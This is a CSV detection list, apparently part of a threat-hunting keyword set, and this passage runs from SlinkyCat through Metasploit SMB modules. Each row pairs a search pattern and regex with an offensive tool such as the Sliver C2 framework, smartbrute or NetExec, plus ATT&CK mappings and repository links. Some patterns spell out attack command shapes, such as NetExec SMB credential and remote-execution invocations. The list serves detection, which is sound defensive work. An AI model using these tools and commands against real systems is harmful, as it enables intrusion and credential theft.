"*SlinkyCat-main*",".{0,1000}SlinkyCat\-main.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*slip* --archive-type * --compression * --paths * --file-content *",".{0,1000}slip.{0,1000}\s\-\-archive\-type\s.{0,1000}\s\-\-compression\s.{0,1000}\s\-\-paths\s.{0,1000}\s\-\-file\-content\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*Sliver C2 Session*",".{0,1000}Sliver\sC2\sSession.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver.service*",".{0,1000}sliver\.service.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*sliver.sh/install*",".{0,1000}sliver\.sh\/install.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver/.sliver*",".{0,1000}sliver\/\.sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver:sliver*",".{0,1000}sliver\:sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver_pcap_parser.py*",".{0,1000}sliver_pcap_parser\.py.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-bof-dev-quickstart.md*",".{0,1000}sliver\-bof\-dev\-quickstart\.md.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-client.exe*",".{0,1000}sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-client.log*",".{0,1000}sliver\-client\.log.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-client_linux*",".{0,1000}sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source 
cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-client_macos*",".{0,1000}sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-client_windows.exe*",".{0,1000}sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-dns*",".{0,1000}sliver\-dns.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*SliverKeylogger*",".{0,1000}SliverKeylogger.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","10","10","139","39","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*sliverpb*",".{0,1000}sliverpb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliverpb.Download*",".{0,1000}sliverpb\.Download.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliverpb.Services*",".{0,1000}sliverpb\.Services.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 
- T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliverpb.Shell*",".{0,1000}sliverpb\.Shell.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server daemon*",".{0,1000}sliver\-server\sdaemon.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server.*",".{0,1000}sliver\-server\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*sliver-server.exe*",".{0,1000}sliver\-server\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server-linux.zip*",".{0,1000}sliver\-server\-linux\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server-macos.zip*",".{0,1000}sliver\-server\-macos\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sliver-server-windows.zip*",".{0,1000}sliver\-server\-windows\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*SlowLoris*",".{0,1000}SlowLoris.{0,1000}","offensive_tool_keyword","SlowLoris","Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this","T1498 - T1496 - T1490","TA0002 - TA0004 - TA0007","N/A","N/A","DDOS","https://github.com/gkbrk/slowloris","1","1","N/A","N/A","10","2342","673","2024-02-14T01:40:34Z","2015-04-26T10:00:33Z" "*slowloris.py*",".{0,1000}slowloris\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SluiEOP.ps1*",".{0,1000}SluiEOP\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*slyd0g/DLLHijackTest*",".{0,1000}slyd0g\/DLLHijackTest.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*Small Shell - Edited By KingDefacer*",".{0,1000}Small\sShell\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*smart_try_password_or_hash(*",".{0,1000}smart_try_password_or_hash\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential 
Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*smartbrute *kerberos*",".{0,1000}smartbrute\s.{0,1000}kerberos.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smartbrute%2520brute*",".{0,1000}smartbrute\%2520brute.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*smartbrute.py*",".{0,1000}smartbrute\.py.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*SmashedPotato.cs*",".{0,1000}SmashedPotato\.cs.{0,1000}","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","83","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z" "*SmashedPotato.exe*",".{0,1000}SmashedPotato\.exe.{0,1000}","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","83","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z" "*smb * -u * -p * * -M bh_owned*",".{0,1000}smb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-M\sbh_owned.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*smb * -u * -p * -M ioxidresolver*",".{0,1000}smb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sioxidresolver.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*smb 1* -u * -p * -x ""whoami""*",".{0,1000}smb\s1.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-x\s\""whoami\"".{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*smb.dcsync*",".{0,1000}smb\.dcsync.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" 
"*smb/impacket*",".{0,1000}smb\/impacket.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb/relay/ntlm*",".{0,1000}smb\/relay\/ntlm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SMB\SigningNotRequired-*.txt*",".{0,1000}SMB\\SigningNotRequired\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*smb_doublepulsar_rce.*",".{0,1000}smb_doublepulsar_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_doublepulsar_rce.rb*",".{0,1000}smb_doublepulsar_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_enumshares*",".{0,1000}smb_enumshares.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_enumshares.*",".{0,1000}smb_enumshares\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_enumusers*",".{0,1000}smb_enumusers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_enumusers.*",".{0,1000}smb_enumusers\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
